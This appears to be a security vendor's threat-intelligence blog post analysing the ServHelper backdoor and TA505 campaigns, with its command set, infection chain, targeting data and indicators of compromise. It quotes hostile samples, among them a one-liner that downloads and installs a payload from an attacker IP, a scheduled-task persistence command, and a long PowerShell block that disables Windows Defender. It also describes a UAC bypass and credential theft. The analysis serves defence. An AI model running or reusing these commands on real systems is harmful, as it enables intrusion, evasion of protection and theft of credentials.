Countries targeted by TA505 using ServHelper
ServHelper is a backdoor first spotted at the end of 2018 by Proofpoint and linked to TA505. This threat actor is known to have distributed Dridex and Locky in the past, in addition to FlawedAmmyy, FlawedGrace and Get2/SDBBot more recently, amongst others.
This blog post will offer some analysis on developments relating to ServHelper, including detail on relevant campaigns and those threat actors related to it. ServHelper was quiet for a while but it is back with several new campaigns from the first week of December 2019. IOCs and TTPs based on ATT&CK are shared at the end of the post.
- The group behind ServHelper is quite likely tied to Dridex Group or a spinoff. The modus operandi and tools are also reminiscent of a group operating legitimate remote administration tools in the past, and tied to Dridex too
- TA505 has been changing tools and infection vectors continuously in the past year, going from private backdoors, loaders and stealers to legitimate remote administration tools
- The usual targets for these attacks are in the banking sector. However, more recently TA505 targeted different kind of businesses in retail and hospitality
- This group’s primary objective is financial gain either directly targeting banks, their clients, or profiting from any opportunities relating to retail account access
- Blueliv’s data shows that the country most targeted by the group is the United States, followed by Canada, Pakistan, Philippines, United Kingdom, France and Germany
Evolution of ServHelper
ServHelper is a backdoor first spotted by Proofpoint in November 2018 when TA505 was distributing it. The backdoor has two different variants dubbed “tunnel” and “downloader” by Proofpoint. The main objective of the “downloader” version is clear from its name: it downloads and installs additional malware, in addition to executing shell commands. The “tunnel” version borrows some commands from the “downloader” version and adds several more to create and manage a back–connect connection from the infected machine to the back–connect server, permitting the attackers a direct connection to the infected machines.
During the first half of the year TA505 used ServHelper and FlawedAmmyy consistently, using different infection vectors like Excel or Word attachments, HTML files, .lnk files or Windows Installer files. At the end of August 2019 researchers at TrendMicro spotted new commands in ServHelper “downloader” version as well as a new use of ISO files to distribute the malware. Before that, another researcher already mentioned a new Vigenère encryption used to encrypt strings within ServHelper binaries too.
Of these, we believe the most interesting ones are “deployns”, which deploys NetSupport Manager, “persist” to achieve persistence in the system via file download/execution, and commands related to keylogging and browser cookie and password theft.
In the following section we will detail some of them and avoid commands already present in other writeups:
- deployns: This command is sent to some bots to deploy NetSupport Manager, a legitimate Remote Administration Tool, in the infected systems. The command downloads the tool compressed in a zip file and encoded with a 1-byte XOR key. More information about this can be found in this writeup. These are some of the URLs we have seen related to this activity:
hxxp://gabardine[.]xyz/log.txt hxxp://kuarela[.]xyz/1.txt hxxp://foxlnklnk[.]xyz/pf1.txt hxxp://cafafafa[.]xyz/pf1.txt hxxp://letitbe[.]icu/2.txt
- persist: This command adds persistence in the machine creating a periodic task using schtasks, which runs a PowerShell script with certain frequency (every hour in the sample we analyzed). The PowerShell script uses paths retrieved from the registry to check if some files exist, downloading a new component from a link otherwise and executing it.
cmd /C schtasks /create /tn 30860 /tr "powershell -nop -ep bypass -f %WINDIR%\help\83421.ps1" /ru system /sc hourly /mo 1).
- keylogstart: It adds keylogging functionalities to the malware, registering keystrokes in a “tv.txt” file located in “C:\Windows\temp\”.
- keyloglist: This command permits verification if the keylogger is running already, looking for the existence of the pipe “\\.\pipe\txtpipe”. If it does not find the pipe it returns an error message to the C2.
- keylogreset: Empties the file used to register the keystrokes.
- keylogdel: Kills any active keylogger instance.
- getkeylog: Retrieves the keystrokes from the “tv.txt” file and sends them to the control panel.
- info: This command gathers information about the infected system (CPU, graphic adapter, memory, Internet speed…) using a PowerShell script and sends that to the C2.
Name Intel® Core™ i5-3337U CPU @ 1.80GHz^Name Standard VGA Graphics Adapter^Total memory: 2,0 gBytes^Speed is 9.26 Mbit/Sec
- getchromepasswords: It gets the content of the file “logins_read.txt”, which has been previously filled in with stored Chrome passwords, and sends this to the control panel. This file can be found in the Windows temp directory (C:/Windows/temp).
- getmozillacookies / getchromecookies: It gets the content of the files “moz.txt” and “cookies.txt”, respectively, which has been previously filled in with Firefox and Chrome cookies, and sends that to the control panel. These files can be found in the Windows temp directory (C:/Windows/temp).
- search: This command sends the number of the collected cookies stored in the files mentioned in the previous comment to the C2. In case no cookies are found then it sends “mozilla/chrome cookies not found” to the control panel.
- sshurl: It sets/retrieves the URL used to download the SSH client for Windows systems, which is used to establish the tunnel to the infected machine.
- setcopyurl: It sets/retrieves the URL used to download a password-protected RAR containing the tool “Runtime’s Shadow Copy”, used to copy files which are in use by the operating system. This URL and tool are used by the commands “fox” and “chrome” to copy the Firefox and Chrome profiles without problems.
- fixrdp: This command modifies the RDP configuration in the Windows registry to avoid the server identity verification (sets “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\AuthenticationLevelOverride” to 0) and creates a scheduled task to restart the computer.
- updateuser: Uses the command “net.exe” to make sure that the current user can connect via RDP and has Admin privileges, adding the user to the groups “Remote Desktop User” and “Administrators”.
- update: This the command which is used with a URL as a parameter in order to download a new executable and update the bot.
- reboot: It creates a task to restart the computer using the command “shutdown /r /f”, launches the task and removes it.
Relevant Campaign Analysis
During the past year we witnessed several TA505 campaigns where ServHelper was installed on victims’ computers. Some of them have been covered by Proofpoint, TrendMicro and other vendors, but due to sheer volume many of have not been assessed publicly.
For instance, in December 2018 TA505 carried out a malspam Christmas campaign against banks worldwide by attaching excel files. It was not something new in terms of modus operandi or attack vector, but it is still relevant because of its seasonality and its targets: banking entities in countries including Chile, Italy, India or South Africa. Indeed, banking entities continued to be a prime target for a good part of the first half of the year in Ireland, Japan, Hong Kong, Turkey, Malta and Philippines amongst others.
Since October 2019, activity related to ServHelper decreased. However, at the beginning of December new campaigns were detected. IOCs related to these campaigns can be seen in our Community.
In this section, we focus on a campaign from the end of September and involving a stealer, Predator The Thief and Team Viewer, in addition to the usual ServHelper sample. The attack vector is again a malspam campaign, but this time including a .doc file which is actually a .docx file (a2e77ee41f4d4d3e8814d07d26ec5be3).
The malicious document includes obfuscated macros which create a BAT file in the Windows temporary directory. It executes it via cmd.exe. The BAT file contains the following line:
wmic process call create 'msiexec /i hxxp://96.9.211[.]157/sdf4r3r3/WinDef.msi /q'
This command launches msiexec to download, install and execute additional malware in the system, making use of Windows Installer.
After executing the downloaded file, WinDef.msi, several files are uncompressed in a temporal directory:
We detail the most relevant information about those files in the following subsections:
This binary is a variant of Predator The Thief, more specifically, version 3.3.1. Predator The Thief is a stealer which collects information like stored passwords, cookies, credit card information, crypto wallets, etc. and report all back to its control panel. In this case, the malicious domain where all the data is sent is soul-fly[.]xyz.
It is not the first time we see a stealer related to TA505 and ServHelper, as we have seen infection overlaps with some specific AZORult and KPOT botnets.
This executable contains a layer of encryption to make the analysis harder, but its behavior is quite simple. The only objective of this malicious code is using the function ShellExecuteExW to execute a PowerShell command encoded in Base64. This PowerShell command re-configures Windows Defender, deactivating real–time protection, avoiding the application sending samples automatically to Microsoft, and other configurations to try to make the attack less detectable. It is quite likely that this component is a piece of code which is available in different underground communities and used by different cybercriminals.
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "AllowFastServiceStartup" -Type DWord -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "ServiceKeepAlive" -Type DWord -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Type DWord -Value 1; New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "Real-Time Protection"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Type DWord -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Type DWord -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Type DWord -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Type DWord -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Type DWord -Value 1; New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "Spynet"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "DisableBlockAtFirstSeen" -Type DWord -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "LocalSettingOverrideSpynetReporting" -Type DWord -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSamplesConsent" -Type DWord -Value 2; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpynetReporting" -Type DWord -Value 2; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name "Start" -Type DWord -Value 4; New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "MpEngine"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpCloudBlockLevel" -Type DWord -Value 2; gpupdate /force; Set-MpPreference -DisableRealtimeMonitoring $true
The first URL downloads another WinDef.exe file whose content is similar to the WinDef.exe files that we are describing, but also includes a 64 bit version of Predator The Thief (gookld.exe).
The second URL was not active at the moment of the analysis, so we could not identify the malware related to it.
This executable is ServHelper, which copies a PowerShell command in the user temporary directory and executes it. As mentioned in other ServHelper analyses, the PowerShell command includes a string encoded in Base64 which is also encrypted with TripleDES. After the decryption we obtain a long script which ServHelper uses to configure and load different components and functionalities. We highlight here two different functions: heller and install.
- heller: This function will be responsible of bypassing UAC using the Windows cloning and restoring component, Sysprep.exe, and hijacking the DLL CRYPTBASE.dll. As it is not possible to write directly in the path “%systemroot%\System32\Sysprep” to carry out the hijack, ServHelper makes use of another Windows component, wusa.exe, which permits Windows Update installations in standalone mode. wusa.exe can handle CAB files, among others, so ServHelper creates a CAB file using makecab.exe, another Windows tool, including the malicious DLL. When Sysprep is executed it loads the malicious DLL due to the DLL hijacking. This technique is mentioned in the UACMe tool.
- install: Thanks to this function ServHelper installs the following components, which come encoded with Base64.
- bot: ServHelper DLL which will be copied to “%systemroot%\help\tmp5212.dat”.
- bot64: 64-bit version of bot.
- rdp: It is the RDP Wrapper Library which will be executed together with the RDP server installed in “%systemroot%\help\tmp5211.dat”. One of the main functionalities is permitting concurrent connections to the infected machine.
- rdp64: 64-bit version of rdp.
- cfg: RDP Wrapper Library configuration, copied to “%systemroot%\help\tmp5213.dat”.
- clip: Legitimate rdpclip.exe. If it is not present already in the infected system, it will be copied to “%systemroot%\system32\rdpclip.exe”.
- vmt: Legitimate rfxvmt.dll. If it is not present already in the infected system, it will be copied to “%systemroot%\system32\rfxvmt.dll”.
- vmt: Legitimate rfxvmt.dll. If it is not present already in the infected system, it will be copied to “%systemroot%\system32\rfxvmt.dll”.
This campaign belongs to the ServHelper botnet which uses the communication key “tkerrrwra” and XOR key “tea”. We have seen that this botnet is most active currently, being April 2019 the moment when we saw the first samples related to it.
Most of the Team Viewer files that are extracted from WinDef.exe are legitimate files of Team Viewer version 11.0.64630.0:
However, the DLL msi.dll is not a legitimate Team Viewer file, but a malicious DLL which is loaded also as a result of DLL hijacking and takes advantage of the Windows DLL loading order. When the TeamViewer launcher, windef.exe, is executed, it finds the malicious msi.dll and loads it into memory. This malicious DLL is used to intercept different Team Viewer functions in order to hide the application window and send the session ID, password and system information to the configured C2:
As we can see in the screenshot, the self-explanatory parameters sent to the C2 are:
The same group modified Ammyy Admin to permit concurrent connections to the machine, for example, and they were sending the connection credentials to a C2 controlled by the group. We cannot confirm that both attackers are the same, but there are indeed similarities in the modus operandi, tools and relations with Dridex.
Threat Actors using ServHelper
As reported by Proofpoint in January 2019, TA505 was the actor who started using ServHelper back in November 2018, mainly targeting financial institutions at that time. Originally, TA505 was described as a malware distribution network which was using the Necurs botnet to distribute different malware families, including Dridex and Locky. Both malware families are closely tied to the Dridex Group (split from the Business Club and tied to Gameover ZeuS or GOZ). Initially most analysts hypothesized that the Dridex Group used TA505 as malware distribution service.
Following this thought process, we might imagine that a new group or a group related to the Dridex Group was using ServHelper to target banks worldwide. However, some researchers think that TA505 is the group behind ServHelper and there are no other affiliates managing the final payload. This is also a plausible hypothesis.
TA505 has been distributing ServHelper for several months now, but we have confirmed a decrease in its activity since 2019 overall. During those months we have seen TA505 deploying other malware families like Flawed Ammy or FlawedGrace and legitimate remote administrations tools like RMS / RUT or TeamViewer. The decrease in the use of ServHelper was seen at the same time as an increase in the use of SDBbot, but new samples were spotted again in recent days.
Some ServHelper botnets did not look like they were controlled by TA505 as they were distributed in a different way and used different back connect servers to create tunnels to the infected machines. Besides this, the ServHelper versions were older than those used by TA505. This suggests that it is likely that ServHelper is not exclusive to TA505. It is possible that other actors can access the source code, a leak of it or a malware kit in underground private communities.
Countries and sectors targeted by ServHelper
As we have mentioned previously, TA505 distributed ServHelper to banks worldwide especially during the first part of 2019 and end of 2018.
However, Blueliv’s threat telemetry reports that the financial sector is not the only vertical which has been targeted by the group. Organizations in the retail and hospitality sectors have also been infected with this malware family, where the criminals try to make use of the direct connection (tunnel) to the machines to find a way to monetize the infections.
Blueliv data reports that most of the infections are located in the United States, followed by Canada, Pakistan, Philippines, United Kingdom, France and Germany. This graphic of the TOP20 countries with the largest number of ServHelper infections show that the attackers are targeting the United Stated most heavily, but with countries on several continents affected.
TA505 is known to have distributed Dridex and Locky in the past. However, it is also likely that the group could have spun off from the Dridex Group to create their own subgroup and operate the final payloads themselves. In this case, they would be fully in control of the different campaigns that we have seen in the past year, where they used a significant number of different malware families and legitimate remote administration tools to carry out their attacks, including ServHelper, FlawedAmmyy, FlawedGrace, Predator The Thief, KPOT, Get2, SDBbot, Remote Manipulator System (RMS) and Team Viewer, among others.
It was not uncommon to see additional tools like Runtime’s Shadow Copy, PowerShell scripts, NetSupport Manager and others, which complemented the functionalities of the malware. However, as this group changes tools continuously, we have also seen a decrease in the use of ServHelper overall despite a number of variants being deployed currently. Some of the new variants include new developments probably meaning that the group will not stop using ServHelper in the next months.
TA505 will not go away any time soon and it will keep targeting organizations worldwide using different tooling to avoid detection. Those tools will likely have the ability to connect to the machines remotely, stealing passwords and downloading additional malware and tools in the infected systems.
A single infection can open the door to groups like TA505 which will use this to move laterally in the targeted network. It is therefore crucial to detect those infections in time, using threat intelligence feeds and gathering actionable information (for example, common TTPs used by these groups.) By using such intelligence, organizations can mitigate their digital risk and prevent these kinds of attacks.
Indicators of Compromise (IOCs)
The IOCs shared in this section and some additional ones have been shared in the Blueliv Community where it is possible to download them, see the behavior in our sandbox and share with other community users.
|hxxp://96.9.211[.]157/sdf4r3r3/WinDef.msi||WinDef Download URL|
|hxxp://0926tv[.]xyz/mystt34834ujf37data/||Team Viewer Panel|
This post was authored by Adrián Ruiz and Jose Miguel Esparza, supported by the Blueliv Labs team